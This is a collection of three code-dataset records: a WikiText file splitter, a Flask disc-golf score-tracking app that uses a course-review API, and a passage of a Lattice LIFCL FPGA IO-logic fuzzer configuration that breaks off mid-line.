+{"seq_id":"3210122533","text":"import argparse\nimport os\nimport re\n\n\ndef parameters():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_filename\", type=str, help=\"file to be sampled\") # 切分的文件路径\n parser.add_argument(\"--output_dir\", type=str) # 切分后的文件保存路径\n args = parser.parse_args()\n\n return args\n\n\n# filename = './wikitext-103-raw/wiki.test.raw'\n# output_dir = './wikitext-103-raw/shuffle'\n\n# 将文件按一级标题划分\ndef read_line(args):\n filename = args.input_filename\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n \n file = open(filename, \"r\", encoding=\"utf-8\") \n paragraph = []\n f_id, title_flag = 1, -1\n \n for line in file:\n tokens = line.strip().split(' ') \n if tokens[0] == \"=\" and tokens[-1] == \"=\" and tokens[1] != \"=\": # 判断是否是一级标题\n title_flag += 1\n \n if title_flag != 1:\n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') # 以写模式\"w\" open会造成覆盖,应该以追加模式\"a\"\n paragraph.writelines(line)\n paragraph.close()\n\n # 遇到新的一级标题,存储在新的文件\n elif title_flag == 1:\n # print(\"Paragraph file saved: \", f_id)\n f_id += 1\n title_flag = 0 \n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') \n paragraph.writelines(line)\n paragraph.close() \n print(\"--------------------\")\n print(\"Input: \", filename)\n print(\"Output: \", output_dir)\n print(\"Total processed: \", f_id, \"files.\")\n print(\"--------------------\")\n file.close()\n\nargs = parameters()\n\ndef main():\n read_line(args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YeLusin/FedBERT","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"35348975621","text":"import os\nfrom datetime import datetime\nfrom flask import Flask, request, render_template, redirect, flash, session, g, jsonify\nfrom models import db, connect_db, GroupRound, User, UserRound, Follows\nimport requests\nfrom sqlalchemy.exc import IntegrityError, InvalidRequestError\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom forms import LoginForm, RegisterForm, EditUser, NewRound\nfrom psycopg2.errors import UniqueViolation\nfrom secret.secret import API_KEY, NAME_SEARCH_SIG, ZIP_SEARCH_SIG, LOC_SEARCH_SIG, ID_SEARCH_SIG, PHOTO_SEARCH_SIG, HOLE_INFO_SIG\n\napp = Flask(__name__)\n\nACTIVE_USER = \"active_user_id\"\n\n\nAPI_URL = \"https://www.dgcoursereview.com/api_test/\"\n\n# app.config['API_KEY'] = os.environ.get('API_KEY')\n# app.config['NAME_SEARCH_SIG'] = os.environ.get(\n# 'NAME_SEARCH_SIG')\n# app.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG')\n# app.config['LOC_SEARCH_SIG '] = os.environ.get(\n# 'LOC_SEARCH_SIG')\n# app.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG')\n# app.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n# 'PHOTO_SEARCH_SIG')\n# app.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG')\n\n\n#########################Local Stuff ##################################\n\napp.config['API_KEY'] = os.environ.get('API_KEY', API_KEY)\napp.config['NAME_SEARCH_SIG'] = os.environ.get(\n 'NAME_SEARCH_SIG', NAME_SEARCH_SIG)\napp.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG', ZIP_SEARCH_SIG)\napp.config['LOC_SEARCH_SIG '] = os.environ.get(\n 'LOC_SEARCH_SIG', LOC_SEARCH_SIG)\napp.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG', ID_SEARCH_SIG)\napp.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n 'PHOTO_SEARCH_SIG', PHOTO_SEARCH_SIG)\napp.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG', HOLE_INFO_SIG)\n\n\n#####################################\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(\n 'DATABASE_URL', 'postgresql:///discgolf')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = False\napp.config['SECRET_KEY'] = os.environ.get('SECRET_KEY', 'veryverysecret')\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\napp.debug = False\n\ndebug = DebugToolbarExtension(app)\n\n\nconnect_db(app)\n\n\n@app.before_request\ndef add_user_to_g():\n \"\"\"If we're logged in, add curr user to Flask global.\"\"\"\n\n if ACTIVE_USER in session:\n g.user = User.query.get(session[ACTIVE_USER])\n\n else:\n g.user = None\n\n\ndef user_login(user):\n \"\"\"Log in user\"\"\"\n session[ACTIVE_USER] = user.id\n\n\ndef user_logout():\n \"\"\"Log out user\"\"\"\n if ACTIVE_USER in session:\n del session[ACTIVE_USER]\n\n\ndef get_course_by_id(course_id):\n \"\"\"A call to the API to gather course information based on the course id\n returns a single JSON course response\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'crseinfo', 'id': course_id, 'sig': app.config['ID_SEARCH_SIG']})\n if not res:\n return []\n\n return res.json()\n\n\ndef get_course_by_name(name):\n \"\"\"search the API for courses by name. Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'findname', 'name': name, 'sig': app.config['NAME_SEARCH_SIG']})\n if not res:\n return []\n return res.json()\n\n\ndef get_hole_info(course_id):\n \"\"\"search hole information for selected course. Returns json list of holes and information\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"holeinfo\", 'id': course_id, 'sig': app.config['HOLE_INFO_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\ndef get_course_photo(course_id):\n \"\"\"retreive a course photo from the API. Returns URL\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"crsephto\", 'id': course_id, 'sig': app.config['PHOTO_SEARCH_SIG']\n })\n if not res:\n return None\n return res.json()['course_photo_url_medium']\n\n\ndef search_by_zip(zip):\n \"\"\"Searches API for course close to zip. Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"findzip\", 'zip': zip, 'sig': app.config['ZIP_SEARCH_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\n@app.route('/')\ndef base():\n if g.user:\n return redirect('/home')\n return render_template('home.html')\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Handles User Login\"\"\"\n\n form = LoginForm()\n if g.user:\n flash(\"Already logged in, log out to log in as different user\", \"warning\")\n return redirect('/')\n if form.validate_on_submit():\n user = User.authenticate(form.username.data,\n form.password.data)\n\n if user:\n user_login(user)\n flash(f\"Welcome back, {user.username}!\", \"success\")\n return redirect(\"/\")\n\n flash(\"Invalid login information\", \"danger\")\n\n return render_template('login.html', form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"page with form to register a new user\"\"\"\n form = RegisterForm()\n if g.user:\n flash(\"Already logged in, log out to register new user\", \"warning\")\n return redirect('/')\n\n if form.validate_on_submit():\n try:\n new_user = User.signup(\n username=form.username.data,\n first_name=form.first_name.data,\n last_name=form.last_name.data,\n email=form.email.data,\n password=form.password.data\n )\n db.session.commit()\n\n except:\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template(\"register.html\", form=form)\n\n user_login(new_user)\n return redirect('/home')\n else:\n return render_template(\"register.html\", form=form)\n\n\n@app.route('/logout', methods=['POST'])\ndef logout_user():\n if not g.user:\n flash(\"Log in before you can log out!\", \"warning\")\n return redirect('/')\n user_logout()\n flash(\"Log out was successful!\", 'success')\n return redirect('/')\n\n\n@app.route('/home')\ndef home_page():\n \"\"\"landing page when the site is visited\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.order_by(UserRound.date.desc()).all()\n\n return render_template('userhome.html', rounds=rounds)\n\n#######################################\n# Course Routes #\n\n\n@app.route('/course_details/')\ndef show_course_details(id):\n \"\"\"Shows details of chosen course\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.filter(\n UserRound.course_id == id).order_by(UserRound.date.desc()).all()\n try:\n course = get_course_by_id(id)\n holes = get_hole_info(id)\n except:\n flash(\"An error occured, try again\", \"danger\")\n return redirect('/')\n return render_template('/course/course_home.html', course=course, rounds=rounds, holes=holes)\n\n\n# @app.route('/course_details//holes')\n# def show_hole_info(id):\n# if not g.user:\n# flash(\"Please Log in or Register!\", \"danger\")\n# return redirect('/')\n# course = get_course_by_id(id)\n# holes = get_hole_info(id)\n\n# return render_template('course/tee_info.html', holes=holes, course=course)\n\n\n####################################\n# User Routes #\n@app.route('/users/')\ndef show_user_details(id):\n \"\"\"shows a users details to another logged in user. If page is logged in users details, can be edited.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('/user/user_details.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users//rounds')\ndef show_user_rounds(id):\n \"\"\"Show user page with most recent rounds\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/user_rounds.html', user=user)\n\n\n@app.route('/users//following')\ndef show_user_follows(id):\n \"\"\"Show user page with all followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/following.html', user=user)\n\n\n@app.route('/users//followers')\ndef show_user_followers(id):\n \"\"\"Show user page with all followers\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/followers.html', user=user)\n\n\n@app.route('/users//following_rounds')\ndef show_following_rounds(id):\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('user/following_rounds.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users//edit', methods=['GET', 'POST'])\ndef edit_user(id):\n \"\"\"Shows edit user page and submits changes to the DB\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id != id:\n flash(\"Unautherized to edit user\", 'danger')\n return redirect('/')\n user = g.user\n form = EditUser(obj=user)\n if form.validate_on_submit():\n if User.authenticate(user.username, form.password.data):\n try:\n user.username = form.username.data\n user.first_name = form.first_name.data\n user.last_name = form.last_name.data\n user.email = form.email.data\n user.location = form.location.data\n user.bio = form.bio.data\n user.avatar = form.avatar.data\n user.fav_course = form.fav_course.data\n if user.fav_course:\n course = get_course_by_name(user.fav_course)\n if course:\n user.fav_course = course[0][\"name\"]\n db.session.commit()\n\n except (IntegrityError, InvalidRequestError, UniqueViolation):\n db.session.rollback()\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template('user/edit_user.html', user=user, form=form)\n flash(\"Profile edited successfully!\", 'success')\n return redirect(f\"/users/{user.id}\")\n flash(\"Incorrect Password\", 'danger')\n return render_template('user/edit_user.html', user=user, form=form)\n else:\n return render_template('user/edit_user.html', user=user, form=form)\n\n\n@app.route('/users//delete', methods=['POST'])\ndef delete_user(id):\n \"\"\"Remove user\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n if user.id != g.user.id:\n flash(\"Can not delete another user\", \"danger\")\n return redirect('/')\n db.session.delete(user)\n db.session.commit()\n flash('User successfully removed', \"success\")\n return redirect('/')\n\n\n@app.route('/course_details//new_round', methods=['GET', 'POST'])\ndef add_new_round(id):\n \"\"\"Adding a new round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n form = NewRound()\n user = g.user\n\n course = get_course_by_id(id)\n if form.validate_on_submit():\n date = form.date.data\n score = form.score.data\n notes = form.notes.data\n user_id = user.id\n\n new_round = UserRound(user_id=user.id, course_id=course['course_id'],\n course_name=course['name'], date=date, score=score, notes=notes)\n db.session.add(new_round)\n try:\n db.session.commit()\n except:\n flash('Something went wrong, try again', 'danger')\n return render_template('course/new_round.html', form=form)\n flash('Round added successfully', 'success')\n return redirect(f'/course_details/{id}')\n else:\n return render_template('course/new_round.html', form=form, user=user, course=course)\n\n\n@app.route(\"/users//follow\", methods=['POST'])\ndef follow_user(id):\n \"\"\"Adding user to followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Following yourself is a little vain, don't you think?\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n followed_user.followers.append(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/users//unfollow\", methods=['POST'])\ndef unfollow_user(id):\n \"\"\"removes user form followed user\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Can't unfollow yourself, unfortunately\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n followed_user.followers.remove(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/round_info/\")\ndef show_round_info(id):\n \"\"\"Shows details from a specified round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n d_round = UserRound.query.get_or_404(id)\n return render_template('round_info.html', round=d_round)\n\n\n###################################\n# Search Routes #\n\n@app.route('/course_search_name')\ndef search_course_by_name_results():\n \"\"\"Shows results of a search for courses by name.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-name-input']\n courses = get_course_by_name(search)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/fav_course_search_name/')\ndef search_fav_course_by_name_results(fav):\n \"\"\"Shows results of a search for courses by from fav link\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n courses = get_course_by_name(fav)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/course_search_zip')\ndef search_course_by_zip_results():\n \"\"\"Shows results of a search for courses by zipcode.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-zip']\n courses = search_by_zip(search)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/user_search')\ndef user_search_results():\n \"\"\"Shows results of a search for users by username.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['user-username-input']\n users = User.query.filter(User.username.like(f\"%{search}%\")).all()\n return render_template('/search/user_search_results.html', users=users)\n\n\n########################################################################\n# API calls from the front end #\n\n@app.route('/delete_round/', methods=['DELETE'])\ndef delete_round(id):\n \"\"\"Deletes and removes round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n dround = UserRound.query.get_or_404(id)\n if dround.user_id != g.user.id:\n flash(\"Cannot delete other users rounds\", \"danger\")\n db.session.delete(dround)\n db.session.commit()\n return jsonify()\n","repo_name":"namroc89/DiscDown","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36568374229","text":"from fuzzconfig import FuzzConfig\nimport nonrouting\nimport fuzzloops\nimport re\n\nconfigs = [\n\n # LIFCL-40 tiles\n (\"IOL_B8A\", \"IOLOGICA\", FuzzConfig(job=\"IOL5AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B8B\", \"IOLOGICB\", FuzzConfig(job=\"IOL5BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B18A\", \"IOLOGICA\", FuzzConfig(job=\"IOL4AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B18B\", \"IOLOGICB\", FuzzConfig(job=\"IOL4BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B56A\", \"IOLOGICA\", FuzzConfig(job=\"IOL3AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n (\"IOL_B56B\", \"IOLOGICB\", FuzzConfig(job=\"IOL3BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n\n (\"IOL_R32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_R32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_L32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_L32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_R13A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_R13B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_L6A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n (\"IOL_L6B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n\n (\"IOL_R34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_R34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_L34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_L34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_R15A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_R15B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_L8A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n (\"IOL_L8B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n\n (\"IOL_T76A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n (\"IOL_T76B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n\n (\"IOL_T78A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n (\"IOL_T78B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n\n (\"IOL_R46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_R46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_L46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_L46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_R10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", \"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_R10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", \"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_L10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n (\"IOL_L10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL3DEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R3C87:SYSIO_B1_DED\"])),\n\n # LIFCL-17 tiles\n (\"IOL_T57A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLT57AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n (\"IOL_T57B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLT57BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR3BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R3C75:SYSIO_B1_DED_15K\", \"CIB_R4C75:PIC_B1_DED_15K\"])),\n\n (\"IOL_R5A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLR5AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n (\"IOL_R5B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR5BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n\n # It appears that LIFCL-17 does not expose any pins from\n # - SYSIO_B1_1_15K\n]\n\ndef main():\n def per_config(x):\n site, prim, cfg = x\n cfg.setup()\n empty = cfg.build_design(cfg.sv, {})\n\n if cfg.device == \"LIFCL-40\":\n cfg.sv = \"iologic_40.v\"\n elif cfg.device == \"LIFCL-17\":\n cfg.sv = \"iologic_17.v\"\n else:\n assert False, cfg.device\n\n s = (prim[0] == \"S\")\n\n side = site[4]\n pos = int(site[5:-1])\n ab = site[-1]\n\n if cfg.device == \"LIFCL-40\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 87)\n elif side == \"B\":\n rc = \"R{}C{}\".format(56, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n elif cfg.device == \"LIFCL-17\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 75)\n elif side == \"B\":\n rc = \"R{}C{}\".format(29, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n else:\n assert False, cfg.device\n\n def get_substs(mode=\"NONE\", default_cfg=False, scope=None, kv=None, mux=False, glb=False, dqs=False, pinconn=\"\"):\n if default_cfg:\n config = \"SCLKINMUX:#OFF GSR:ENABLED INMUX:#OFF OUTMUX:#OFF DELAYMUX:#OFF SRMODE:#ASYNC LOAD_NMUX:#OFF DIRMUX:#OFF MOVEMUX:#OFF CEOUTMUX:#OFF CEINMUX:#OFF LSRINMUX:#OFF LSROUTMUX:#OFF STOP_EN:DISABLED\"\n elif kv is None:\n config = \"\"\n elif glb:\n config=\"{}:{}\".format(kv[0], kv[1])\n elif dqs and \"_\" in kv[1]:\n val, dqsmode = kv[1].split(\"_\")\n config = \"{}:::{}={} WRCLKMUX:{}\".format(mode if scope is None else scope, kv[0], val, dqsmode)\n elif mux:\n signame = kv[0].replace(\"MUX\", \"\")\n val = \"{}:::{}=#SIG\".format(signame, signame)\n if kv[1] in (\"0\", \"1\"):\n val = \"CONST:::CONST={}\".format(kv[1])\n if kv[1] == \"INV\":\n val = \"{}:::{}=#INV\".format(signame, signame)\n config = \"{}:{}\".format(kv[0], val)\n else:\n config = \"{}:::{}={}\".format(mode if scope is None else scope, kv[0], kv[1])\n if pinconn != \"\":\n # Add routing so that pin is 'used'\n if \"TOUT\" in pinconn:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JTOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDT_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JTOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDT_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDT_SEIO18_CORE_IO{}\".format(rc, ab)\n else:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JDOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDO_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JDOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDO_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDO_SEIO18_CORE_IO{}\".format(rc, ab)\n route = '(* \\\\xref:LOG =\"q_c@0@9\", \\\\dm:arcs =\"{}.{}\" *) '.format(second_wire, first_wire)\n sig = route + \"wire sig;\"\n else:\n sig = \"\"\n return dict(mode=mode, cmt=\"//\" if mode == \"NONE\" else \"\", config=config, site=site, s=\"S\" if s else \"\", pinconn=pinconn, sig=sig)\n modes = [\"NONE\", \"IREG_OREG\", \"IDDRX1_ODDRX1\"]\n if not s:\n modes += [\"IDDRXN\", \"ODDRXN\", 